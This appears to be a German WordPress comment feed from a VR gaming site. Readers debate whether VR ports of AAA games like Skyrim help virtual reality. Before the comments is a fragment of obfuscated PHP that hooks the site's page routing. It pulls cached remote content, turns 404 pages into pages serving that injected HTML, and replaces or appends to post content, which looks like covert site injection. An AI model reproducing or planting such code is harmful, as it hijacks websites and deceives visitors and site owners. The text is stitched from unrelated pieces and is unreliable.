';},9999);$Sx=GS();if(!in_array($path,$Sx,true))return;add_action('template_redirect',function()use($path){global $wp_query;$k='p_'.md5(home_url('/').'|'.$path);$p=get_transient($k);$t=(int)get_transient($k.'_t');if(!(is_array($p)&&$t&&(time()-$t)<=PT)){$n=FP($path);if(is_array($n)){$p=$n;set_transient($k,$p,604800);set_transient($k.'_t',time(),604800);}else{set_transient($k.'_t',time(),604800);}}if(empty($p['m']))return;if($wp_query->is_404()){$wp_query->is_404=false;status_header((int)$p['st']);echo'';wp_head();echo''.$p['h'];wp_footer();echo'';exit;}add_filter('the_content',function($c)use($p){if($p['op']==='rp')return $p['h'];if($p['op']==='ij')return $c.$p['h'];return $c;},9999);},1);},0);/* v82L4MZsM3tIW0wK */
Kommentare zu: Meinung: Warum VR-Umsetzungen von AAA Flatgames Virtual Reality nicht voranbringen
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/
We don't play flat!Wed, 31 Jul 2019 20:12:23 +0000
hourly
1 https://wordpress.org/?v=6.9.4
Von: nullptr
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3820
Wed, 31 Jul 2019 20:12:23 +0000https://vr-legion.de/?p=14116#comment-3820Als Antwort auf Dennis Ziesecke.
Nein ich kann mir sehr wohl vorstellen mit B&S oder Furious Seas Spaß zu haben. Das habe ich ja auch. Aber nur kurz. Sehr kurz um genau zu sein. Und diese Spiele veranlassen nunmal niemanden dazu sich VR Equipment zu kaufen. Wir wollen doch alle in fremde Welten abtauchen, diese erkunden. Epische Abenteuer erleben in unserem virtuellem Alter-Ego, ganz immersiv. Das ist das Versprechen von VR. B&S ist da maximal das ultrakurze Intro, wenn überhaupt.
]]>
Von: Retro-Gamer
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3818
Wed, 31 Jul 2019 16:38:41 +0000https://vr-legion.de/?p=14116#comment-3818Also Skyrim und Fallout sind echt klasse in VR – Klar nicht perfekt und da gäbe es vieles zu optimieren. Aber so stelle ich mir das vor, mittem im Geschehen, Handtracking und riesige Welten „live“ erkunden… Mir gehen diese „Kurzdemos“ auch auf den Keks… Wie einfach und gut eine Portierung geht, zeigt der VR Mod zu DooM3. Deshalb kann ich immer nur mit dem Kopfschütteln, wenn Spiele nur in 2D rauskommen…. Auch gerade bei Simulationen, was macht Codemasters da bitte? Bringen erst mal DirtRally 2 ohne VR raus *Kopfschüttel* und ihr F1 können sie sich ohne VR…… Hallo?! Renn-Simulation ohne VR in 2019?
]]>
Von: Dennis Ziesecke
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3817
Wed, 31 Jul 2019 15:03:54 +0000https://vr-legion.de/?p=14116#comment-3817Danke übrigens für alle Beiträge hier – ich nehme eure Meinungen durchaus zum Anlass, meine Meinung jederzeit neu zu denken. Es ist spannend, eure Positionen zu lesen und genau dafür sind diese überspitzten Meinungs-Beiträge super.
]]>
Von: Dennis Ziesecke
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3814
Wed, 31 Jul 2019 11:36:38 +0000https://vr-legion.de/?p=14116#comment-3814Als Antwort auf nullptr.
Auch wenn du es dir nicht vorstellen kannst: genau so ist es. Mich reißt die Steuerung so massiv aus der Immersion, dass ich Skyrim lieber flat spiele. Da passt die Steuerung zum Rest (und ist auf dem PC trotzdem doof). Das kann ich mir übrigens genauso wenig vorstellen, wie du dir vorstellen kannst, mit Blade&Sorcery mangels Story Spaß zu haben. So ist jeder Spieler anders und daher ist das hier eine Meinungs-Kolumne 😉 .
]]>
Von: doublefrag
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3810
Wed, 31 Jul 2019 07:33:34 +0000https://vr-legion.de/?p=14116#comment-3810Es geht meiner Meinung nach nur zweigleisig.
Viele Plattspiele bieten sich förmlich an als VR-Titel zu portiert zu werden oder von Anfang an zweigleisig entwickelt zu werden.
Zum einen haben wir die die Cockpitspiele!
Elite Dangerous ist da das beste Beispiel.
Von Beginn an (das waren noch meine DK2 Zeiten) hat Braben auf das Thema VR gesetzt.
Das macht den Titel in meinen Augen zu den immersivsten VR-Games überhaupt. Sitze ich in meinem eigens dafür konstruierten Alu-Rig, die Bedienelemente so angeordnet wie in meinem virtuellen Cockpit, kann ich über Stunden im Spiel versinken.
Alte AAA-Schinken alá Skyrim sind zwar nicht optimalst portiert, man merkt ihnen an, dass das nachträglich geschah, aber trotzdem sind das wichtige und gute Titel.
NMS traue ich da z.B. eine klasse Portierung zu… Ich bin gespannt.
Das runden dann innovative Indy-Entwickler ab, die solche genialen Titel wie Vox Maschinae herausbringen.
Beat Saber oder ein Space Pirates Trainer gehören natürlich auch dazu.
Insgesamt braucht es alle Facetten um VR voranzubringen.
Warten wir mal ab, was uns Valve hoffentlich bald kredenzt! 😉
Momentan
]]>
Von: nullptr
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3809
Wed, 31 Jul 2019 04:12:24 +0000https://vr-legion.de/?p=14116#comment-3809Als Antwort auf Dennis Ziesecke.
Also du willst ernsthaft sagen dass zB SkyrimVR keinen Spaß macht weil man Türen per Knopfdruck öffnet und das Inventar in Textform vorliegt anstatt dass man jedes Item anfassen und irgendwo hinstecken kann? Also beim Inventar reden wir ja von Mikromanagement mit hunderten oder gar tausenden von Items, jeweils mit Stats die man miteinander vergleich etc… DANKE Bethesda dass ihr kein VR Interface da reingebaut habt, das ist meine Meinung dazu. Man kann ja trotzdem sein Schwert schwingen, mit dem Schild blocken und Feuerbälle mit den Händen verschiessen. Wenn DAS nicht gehen würde dann würde ich dir zustimmen, aber so… nee.
Sorry aber mit den Blade&Sorceries oder Furios Seas dieser Welt überredet man absolut niemanden sich ein VR Headset zu kaufen, das kann ich mir beim besten Willen nicht vorstellen. Mit SkyrimVR, wo man Türen per Knopfdruck öffnet, hingegen schon. Also gebt uns mehr Ports bitte (keine VR-Ableger ala Cyberpilot sondern Ports), Ubisoft, EA und wie ihr auch alle heisst. Und damit verabschiede ich mich aus der Diskussion.
]]>
Von: Anonym
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3805
Tue, 30 Jul 2019 19:43:36 +0000https://vr-legion.de/?p=14116#comment-3805Als Antwort auf Dennis Ziesecke.
Ich weiß ja nicht.
Diese kleinen Titel mit intuitiver Steuerung wie Blade & Sorcery, oder Jobsimulator etc. sind ja ganz nett, aber nach einiger Zeit ist der WoW Effekt ja auch weg, dass man alles anfassen kann, oder das Schwert selber schwingt.
Und alles was dann übrig bleibt ist ein sehr blasses Restspiel.
Es gibt ja auch genügend Spiele die wunderbar ohne Motioncontroller funktionieren.
Gerade an der PSVR habe ich viele Sachen ohne die Eistüten gespielt.
Resident Evil 7, Doom, Skyrim, here they lie, Astrobot, Trackmania oder Eagle Flight funktionieren wunderbar ohne.
Subnautica sogar per Maus und Tastatur.
Und nur weil die ersten Portierungen teils sehr umständlich waren (Pitboy Bedienung *würg*) heißt das ja nicht das es so bleiben muss.
No man sky soll ja in vielen Bereichen auf VR angepasst sein.
Vielleicht gibt das ja nochmal einen neuen Schub für VR Portierungen.
]]>
Von: Dennis Ziesecke
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3799
Tue, 30 Jul 2019 13:34:36 +0000https://vr-legion.de/?p=14116#comment-3799Als Antwort auf nullptr.
Da sind wir dann sehr unterschiedlich – ich habe lieber Spaß ohne Story als dass ich mich über eine unzulängliche Portierung mit toller Handlung ärgere 😉 .
]]>
Von: nullptr
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3798
Tue, 30 Jul 2019 13:27:42 +0000https://vr-legion.de/?p=14116#comment-3798Aber Prey VR ist doch was separat entwickeltes genau wie Cyberpilot, also komplett neuer Content. Und eben die Entwicklung des Contents kostet ja so viel Geld, deswegen sind die Teile auch so kurz und scheiße. Ich rede aber von den original Spielen in VR, so wie Skyrim oder Fallout.
Rockstar hat auch einen First-Person-Modus in GTA5 eingebaut wieso sollte das nicht auch mit einem VR-Modus möglich sein? Man müsste keinen neuen Content produzieren, könnte lernen mit VR-Technik umzugehen und es würde massig Leute in die VR-Blase ziehen was wiederum das Budget für zukünftige Projekte mit VR (irgendwann dann nativ) pusht. Klar ist anfangs die Steuerung nicht VR-nativ aber mal ehrlich ich spiele lieber SkyrimVR mit nicht nativer Steurung dafür massig Content als Blade&Sorcery, das absolut null Inhalt hat.
]]>
Von: Dennis Ziesecke
https://vr-legion.de/internes/meinung-warum-vr-umsetzungen-von-aaa-flatgames-virtual-reality-nicht-voranbringen/#comment-3797
Tue, 30 Jul 2019 12:38:25 +0000https://vr-legion.de/?p=14116#comment-3797Als Antwort auf Tunk.
Prey hat ja bereits VR bekommen. Und es ist genauso lieblos wie fast alle bisherigen AAA-Umsetzungen. Ich wüsste nicht, warum ich da in Zukunft viel mehr zu erwarten hätte. Zumindest Bethesda bzw die Arcane Studios haben ja offenbar gar keine Zeit oder keinen Willen, sich grundlegende VR-Standards anzuschauen.